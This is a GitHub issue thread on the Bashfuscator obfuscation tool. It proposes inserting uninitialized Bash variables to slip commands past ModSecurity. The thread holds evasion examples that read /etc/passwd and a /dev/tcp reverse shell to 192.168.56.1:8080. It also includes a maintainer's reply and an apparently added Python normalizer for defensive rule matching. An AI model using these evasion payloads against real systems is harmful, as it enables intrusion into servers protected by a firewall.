
Add The Uninitialized Variable obfuscate to mutators #25

Open
dmknght opened this issue Nov 16, 2019 · 2 comments

Comments

@dmknght

dmknght commented Nov 16, 2019

I've tested this method and it bypassed mod security perfectly, so I think it will be wonderful if Bashfuscator can add this method.

Test case 1:
  • Command ls -la gets blocked by mod security
  • ls$u -la worked

Test case 2:
  • command cat /etc/passwd gets blocked by mod security
  • command cat$u /etc$x/passwd$y worked

Test case 3:
  • /bin$u/bash$u -i >& /dev$u/tcp$u/192.168.56.1/8080 0>&1 doesn't get blocked but it can't create the connection (reverse shell), so I did it manually (using a pipeline may have been blocked by mod security because of the characters |, ;, &&)
    Step 1: echo$x "/bin$u/bash$u -i >& /dev$u/tcp$u/192.168.56.1/8080 0>&1" > file name
    Step 2: bash$a filename

Source: https://www.secjuice.com/web-application-firewall-waf-evasion/

@capnspacehook
Member

Bashfuscator already does this to a certain extent; the special variables $@ and $* are liberally placed throughout obfuscated payloads. The reason only these variables are used is that they are special reserved variables for Bash, and due to the way Bashfuscator works, they will almost always be blank.

Generating randomly named variables and inserting them in Bash payloads is pretty risky... Bashfuscator can't know what variables will be already used in the environment in which payloads will be run, so there is a chance that payloads will fail in certain environments.

For instance, say that in the environment you're currently in, the variable $foo is initialized. Say also that you generate a payload with Bashfuscator, and using your uninitialized variable obfuscation method, it by chance inserts $foo into part of the payload. Because $foo is set, the payload will fail to execute. See the issue?
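The two points in this thread, that the WAF sees `cat$u /etc$x/passwd$y` while Bash sees `cat /etc/passwd`, and that a randomly chosen name breaks the command whenever it happens to be set, can both be reproduced with a small expansion model. This is an added example, not Bashfuscator's code; it assumes a simplified Bash (no quoting or nested expansions) and uses constructed samples taken from the test cases above. The defender-side use is normalization: collapse the expansions before matching, instead of trying to write rules against every `$name` placement.

```python
import re

# Matches the expansions this thread is about: $name, ${name}, and the
# special positional parameters $@ / $* that Bashfuscator already sprinkles in.
_EXPANSION = re.compile(
    r"\$(?:\{([A-Za-z_][A-Za-z0-9_]*)\}|([A-Za-z_][A-Za-z0-9_]*)|([@*]))"
)


def expand_like_bash(cmd: str, env: dict) -> str:
    """Resolve simple parameter expansions the way Bash would at run time:
    unset names and $@/$* (no positional arguments) become the empty string,
    set names become their value.  Quoting and nested expansions are out of
    scope for this model; it is enough to reason about the thread's cases."""
    def repl(m):
        name = m.group(1) or m.group(2)
        if name is None:  # $@ or $* with no positional parameters
            return ""
        return env.get(name, "")
    return _EXPANSION.sub(repl, cmd)


def normalize_for_inspection(cmd: str) -> str:
    """Defender-side canonical form: assume every expansion is empty, which
    is exactly what the obfuscation relies on, so a rule written for the
    plain command can be matched against the collapsed text instead."""
    return expand_like_bash(cmd, {})


def matches_rule(cmd: str, patterns) -> bool:
    """Apply plain-command regexes to the normalized text."""
    canon = normalize_for_inspection(cmd)
    return any(re.search(p, canon) for p in patterns)


if __name__ == "__main__":
    # Constructed samples taken from the test cases in this issue.
    samples = ["ls$u -la", "cat$u /etc$x/passwd$y", "c$@at$* /etc/passwd"]
    rules = [r"\bcat\b.*/etc/passwd"]
    for s in samples:
        print(f"{s!r:32} -> {normalize_for_inspection(s)!r:22} "
              f"flagged={matches_rule(s, rules)}")
    # The failure mode from the reply above: if a random name happens to be
    # set in the target environment, the command itself is corrupted.
    print(repr(expand_like_bash("ls$foo -la", {"foo": "bar"})))  # 'lsbar -la'
```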

@dmknght
Author

dmknght commented Nov 22, 2019

Bashfuscator already does this to a certain extent; the special variables $@ and $* are liberally placed throughout obfuscated payloads.

I noticed this before I created the issue. But the current modules use a pipeline to execute the command, so it can't bypass the WAF (mod security, for example). So is there any chance to run the command without a pipeline (like adding an option --no-pipeline?). IMO creating an obfuscated payload that can bypass a WAF is the thing that everybody needs :D

Generating randomly named variables and inserting them in Bash payloads is pretty risky...

Understood :D
